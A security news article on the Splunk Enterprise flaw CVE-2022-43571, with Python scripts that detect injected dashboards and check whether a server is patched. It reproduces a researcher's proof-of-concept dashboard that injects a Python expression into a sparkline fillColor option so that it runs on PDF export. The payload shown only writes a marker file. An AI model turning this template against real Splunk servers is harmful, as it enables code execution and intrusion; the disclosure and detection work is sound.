A security researcher has published proof-of-concept (PoC) code for CVE-2022-43571 on his blog. The PoC achieves code execution on Splunk Enterprise through the dashboard PDF generation component.
Splunk Inc. is an American software company based in San Francisco, California, that produces software for searching, monitoring, and analyzing machine-generated data via a Web-style interface. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape.
Last month, Splunk announced the release of a new set of quarterly patches for Splunk Enterprise, which include fixes for nine high-severity vulnerabilities.
The most severe of these defects carry a CVSS score of 8.8 and are described as remote code execution (RCE) flaws. One of them, tracked as CVE-2022-43571, allows a remote authenticated attacker to execute arbitrary code on the system because of a code injection error in the dashboard PDF generation component. A remote attacker with low privileges can place a crafted value in a SimpleXML dashboard, trigger a PDF export of that dashboard, and thereby achieve arbitrary code execution on the Splunk server.
The researcher's CVE-2022-43571 PoC embeds the payload in a SimpleXML dashboard that renders a sparkline: the payload is the value of the sparkline's fillColor format option, where a colour is expected. Triggering it only requires opening the dashboard and choosing Export -> Generate PDF, at which point the PDF generation component executes the injected code. The payload in the PoC is deliberately benign; it appends a marker string to /tmp/PoC_code_injection.txt as proof that code ran.
<dashboard script="table_with_multiple_sparkline_colors.js">
  <label>Sparkline with different colors</label>
  <row>
    <panel>
      <!-- Cosmetic CSS for the table; it plays no part in the injection -->
      <html depends="$alwaysHideCSSStylePanel$">
        <style>
          #tableWithMultipleSparklineColors table tbody tr td[data-cell-index="0"]{
            font-size: 160% !important;
            text-align:center !important;
            color:white !important;
          }
          #tableWithMultipleSparklineColors table thead{
            visibility:hidden !important;
          }
          #statistics table tbody tr:nth-child(1) td.string,
          #statistics table tbody tr:nth-child(1) td.numeric{
            font-size: 120%;
            font-weight: bold;
          }
        </style>
      </html>
      <table id="tableWithMultipleSparklineColors">
        <!-- Any search that produces a sparkline field will do; this one
             charts internal log volume per component -->
        <search>
          <query>index=_internal
            | chart sparkline(count) as sparkline count as Total by component
            | sort - Total
            | head 7
            | reverse
            | streamstats count as sno
            | reverse
            | append [| makeresults | fields - _time | eval sno="",sparkline="Sparkline", Total="Total"]
            | reverse
            | eval sno=sno-2
            | eval sno=case(sno=-1,"down",
                sno=0,"0",
                sno=1,"1",
                sno=2,"2",
                sno=3,"3",
                sno=4,"4",
                sno=5,"All",
                true(),sno)
            | table sno sparkline Total</query>
          <earliest>-2h@h</earliest>
          <latest>now</latest>
          <sampleRatio>1</sampleRatio>
        </search>
        <option name="count">20</option>
        <option name="dataOverlayMode">none</option>
        <option name="drilldown">none</option>
        <option name="percentagesRow">false</option>
        <option name="rowNumbers">false</option>
        <option name="totalsRow">false</option>
        <option name="wrap">true</option>
        <format type="color" field="sno">
          <colorPalette type="map">{"down":#336699,
            "0":#8C0000,
            "1":#8B4000,
            "2":#FC6600,
            "3":#F9A602,
            "4":#FFCC00,
            "All":#000000}</colorPalette>
        </format>
        <!-- Injection point: fillColor should be a colour, but the PoC supplies
             a Python expression that appends a marker string to a file in /tmp
             when the dashboard is exported to PDF -->
        <format field="sparkline" type="sparkline">
          <option name="lineColor">green</option>
          <option name="fillColor">open('/tmp/PoC_code_injection.txt','a').write('color your life!')</option>
          <option name="height">20px</option>
          <option name="width">500px</option>
        </format>
      </table>
    </panel>
  </row>
</dashboard>
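The injection point in the PoC is a sparkline format option whose value should only ever be a colour or a pixel size but is instead a Python expression. The script below is an added example for this article, not code from Splunk or from the PoC author: it scans SimpleXML dashboards (for instance the files an app ships under default/data/ui/views/ or that users save under local/data/ui/views/) and flags any sparkline option whose value falls outside a strict allowlist, which is how a defender can find dashboards carrying this kind of payload. The allowlist is deliberately limited to the four options the PoC uses, the colour and pixel grammars are this example's assumptions, and the two embedded dashboards are constructed test input (a trimmed copy of the PoC above and a clean variant). The same check_option guard is the shape of validation a renderer should apply before an option value reaches any code path that interprets it.

```python
"""Scan Splunk SimpleXML dashboards for sparkline <option> values that are not
plain colours or pixel sizes.  Added example for this article; not code from
Splunk or from the PoC author.  The allowlist and grammars are assumptions."""
import re
import sys
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

# Assumed grammars: a CSS-style colour name, a #rgb / #rrggbb hex colour, or a
# pixel size.  None of them admits quotes, parentheses, dots or underscores,
# which injected expressions rely on.
COLOUR_VALUE = re.compile(r"^(?:[A-Za-z]{3,20}|#[0-9A-Fa-f]{3}|#[0-9A-Fa-f]{6})$")
PIXEL_VALUE = re.compile(r"^[0-9]{1,4}px$")

# Deliberately limited to the four options that appear in the PoC; extend it
# from Splunk's sparkline documentation for production use.
ALLOWED_OPTIONS = {
    "lineColor": COLOUR_VALUE,
    "fillColor": COLOUR_VALUE,
    "height": PIXEL_VALUE,
    "width": PIXEL_VALUE,
}

Finding = Tuple[str, str, str, str]  # (field, option name, value, reason)


def check_option(name: str, value: str) -> Optional[str]:
    """Return a reason the option is suspicious, or None if it is acceptable.
    This is the guard a renderer should apply before using the value."""
    value = value.strip()
    pattern = ALLOWED_OPTIONS.get(name)
    if pattern is None:
        return "option name not in allowlist"
    if not pattern.match(value):
        return "value is not a colour or pixel size"
    return None


def scan_xml(xml_text: str) -> List[Finding]:
    """Return every sparkline option in the dashboard that fails check_option."""
    root = ET.fromstring(xml_text)
    findings: List[Finding] = []
    for fmt in root.iter("format"):
        if fmt.get("type") != "sparkline":
            continue
        field = fmt.get("field", "?")
        for opt in fmt.findall("option"):
            name = opt.get("name", "")
            value = (opt.text or "").strip()
            reason = check_option(name, value)
            if reason is not None:
                findings.append((field, name, value, reason))
    return findings


def scan_file(path: str) -> List[Finding]:
    with open(path, encoding="utf-8") as fh:
        return scan_xml(fh.read())


# Constructed test input: a trimmed copy of the PoC dashboard from the article
# (only the parts the scanner looks at) and a clean dashboard for comparison.
POC_DASHBOARD = """\
<dashboard>
  <label>Sparkline with different colors</label>
  <row><panel><table id="tableWithMultipleSparklineColors">
    <search><query>index=_internal | chart sparkline(count) as sparkline count as Total by component</query></search>
    <format field="sparkline" type="sparkline">
      <option name="lineColor">green</option>
      <option name="fillColor">open('/tmp/PoC_code_injection.txt','a').write('color your life!')</option>
      <option name="height">20px</option>
      <option name="width">500px</option>
    </format>
  </table></panel></row>
</dashboard>
"""

CLEAN_DASHBOARD = POC_DASHBOARD.replace(
    "open('/tmp/PoC_code_injection.txt','a').write('color your life!')", "#336699")

if __name__ == "__main__":
    # Usage: python scan_sparklines.py view1.xml view2.xml ...
    # With no arguments the two constructed dashboards are scanned instead.
    sources = [(p, scan_file(p)) for p in sys.argv[1:]] or [
        ("poc", scan_xml(POC_DASHBOARD)), ("clean", scan_xml(CLEAN_DASHBOARD))]
    for label, findings in sources:
        for field, name, value, reason in findings:
            print(f"{label}: field={field} option={name} ({reason}): {value}")
```

Run against the constructed input, the PoC dashboard yields exactly one finding (the fillColor option) and the clean variant none. An unknown option name is flagged rather than ignored, which errs on the side of review; tune ALLOWED_OPTIONS to the documented option set before running it over a whole deployment.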
This bug is fixed in Splunk Enterprise 8.1.12, 8.2.9 and 9.0.2. Affected users should upgrade promptly to the fixed release for their branch or to a later version. Because the flaw is reachable by any authenticated user with low privileges, and a working PoC is now public, an instance that cannot be patched immediately should treat every account able to create or edit dashboards as able to run code on the server.
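Checking exposure correctly needs a per-branch comparison, since 8.2.8 is numerically above 8.1.12 yet still vulnerable. The script below is an added example for this article, not Splunk's own tooling: it parses the version out of the output of `$SPLUNK_HOME/bin/splunk version` (or of any text containing an x.y.z version, such as the `version` field of the /services/server/info REST endpoint) and reports whether that release carries the fix. The three fixed versions come from the article; the handling of other branches (9.1 and later treated as fixed, anything before 8.1 treated as vulnerable), the default install path /opt/splunk, and the sample CLI output with its made-up build id are this example's assumptions.

```python
"""Decide whether a Splunk Enterprise version carries the fix for
CVE-2022-43571.  Added example for this article; not Splunk's tooling.
Fixed releases are the three the article names; how other branches are
treated is this example's assumption (see is_fixed)."""
import os
import re
import subprocess
from typing import Tuple

# Per-branch fixed versions as reported in the article.
FIXED_BY_BRANCH = {
    (8, 1): (8, 1, 12),
    (8, 2): (8, 2, 9),
    (9, 0): (9, 0, 2),
}

# Constructed sample of what `splunk version` prints; the build id is made up.
SAMPLE_CLI_OUTPUT = "Splunk 8.2.8 (build 0c2e6c4f39ab)\n"


def parse_version(text: str) -> Tuple[int, int, int]:
    """Pull the first dotted x.y.z version out of CLI or REST output."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)\b", text)
    if not m:
        raise ValueError(f"no x.y.z version in {text!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3))


def is_fixed(version: str) -> bool:
    """True if the release includes the CVE-2022-43571 fix.

    Comparison is per branch: 8.2.8 is numerically above 8.1.12 but is still
    vulnerable, because its own branch was fixed only at 8.2.9.  Assumptions:
    branches newer than 9.0 were cut after the fix, and branches older than
    8.1 are treated as vulnerable because no fix was published for them."""
    major, minor, patch = parse_version(version)
    branch = (major, minor)
    if branch in FIXED_BY_BRANCH:
        return (major, minor, patch) >= FIXED_BY_BRANCH[branch]
    return branch > (9, 0)


def installed_version_output() -> str:
    """Run the local Splunk CLI; fall back to the constructed sample if absent."""
    splunk_bin = os.path.join(os.environ.get("SPLUNK_HOME", "/opt/splunk"), "bin", "splunk")
    try:
        return subprocess.run([splunk_bin, "version"], capture_output=True,
                              text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return SAMPLE_CLI_OUTPUT


if __name__ == "__main__":
    out = installed_version_output()
    print(out.strip(), "->", "fixed" if is_fixed(out) else "VULNERABLE")
```

The fallback to the sample output exists so the script runs on a workstation without Splunk installed; on a real host, point SPLUNK_HOME at the installation and read the verdict for that server.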